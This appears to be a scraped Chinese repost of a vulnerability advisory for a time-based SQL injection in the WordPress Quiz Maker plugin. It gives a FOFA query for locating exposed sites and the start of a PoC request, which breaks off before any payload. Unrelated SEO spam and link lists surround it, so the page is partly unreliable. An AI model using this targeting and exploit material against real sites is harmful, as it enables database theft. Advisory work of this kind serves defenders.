当前位置: 首页 > news >正文

做网站主流网站p2f网站系统

做网站主流网站,p2f网站系统,dw网站开发教程,泰安做百度推广的公司0x01 产品简介 WordPress Quiz Maker插件是一款功能强大的测验生成工具,旨在帮助用户轻松、快速地构建复杂的测验和考试。插件支持多种问题类型,包括单选框(MCQ)、复选框(MCQ)、下拉列表(MCQ)、文本、短文本、数字、日期等。还支持横幅(HTML)显示信息性消息、填空题…

0x01 产品简介

WordPress Quiz Maker插件是一款功能强大的测验生成工具,旨在帮助用户轻松、快速地构建复杂的测验和考试。插件支持多种问题类型,包括单选框(MCQ)、复选框(MCQ)、下拉列表(MCQ)、文本、短文本、数字、日期等。还支持横幅(HTML)显示信息性消息、填空题以及匹配题,让测验更加多样化和全面,适合各种规模和需求的网站使用。

0x02 漏洞概述

WordPress的Quiz Maker插件在6.5.8.3版本及以下存在基于时间的SQL注入漏洞,漏洞位于“ays_questions”参数上。由于对用户提供的参数缺乏足够的转义处理和对现有SQL查询的充分准备不足,使得未经验证的攻击者能够在已有的查询中附加额外的SQL查询,从而可能从数据库中提取敏感信息。

0x03 影响范围

Quiz Maker <= 6.5.8.3

0x04 复现环境

FOFA:"/wp-content/plugins/quiz-maker/"

0x05 漏洞复现

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe
http://www.yayakq.cn/news/138385/

相关文章:

  • A华企网络网站建设博物馆设计公司排名
  • 阿里云服务器618seo口碑优化
  • 照片展示网站模板免费下载notepad wordpress
  • 网站名称和备案公司名称不一样在虚拟主机上建设多个网站
  • 贵阳企业网站模板武威建设厅网站
  • 做的网站在不同浏览器做网站一般收取多少钱
  • 做pc端网站案例织梦收费
  • 公司做网站需要准备什么资料华为手机WordPress
  • 广州网站建设 企业如何做logo模板下载网站
  • 网站开发主题惠州建设工程造价管理站网站
  • 北京网站开发建设wordpress网站的根目录在哪里
  • 网站设计的特点nginx伪静态 wordpress
  • 电子商务的网站开发网站建设学那些课
  • 网站备案变更公司名称湖南省建设工程施工合同
  • 网站推广的名词解释磁力猫最佳搜索引擎入口
  • 如何将网站转成小程序php网站用到的知识
  • 给了几张图让做网站网站建设的调研报告
  • 广东网站建设十大品牌怎么开发游戏软件
  • 南县网站设计卸载wordpress插件
  • 网站优化应该怎么做最好看免费观看高清大全电影
  • 网站开发环境实验报告自己做的网站改变字体
  • 公众号微网站建设认证平面设计的网站
  • 龙江做网站品牌设计需要学什么
  • 免备案做网站 可以盈利吗网站分享
  • 北京最大的软件开发公司外包网站怎么做seo
  • 湟源县网站建设网站开发最后五个阶段
  • 个性化定制网站的特点2022年传销最新消息
  • 大连手机自适应网站建设报价自适应网站平台
  • 一级做c爱片的网站充值网站怎么做的
  • 大良营销网站建设资讯如何更好的建设和维护网站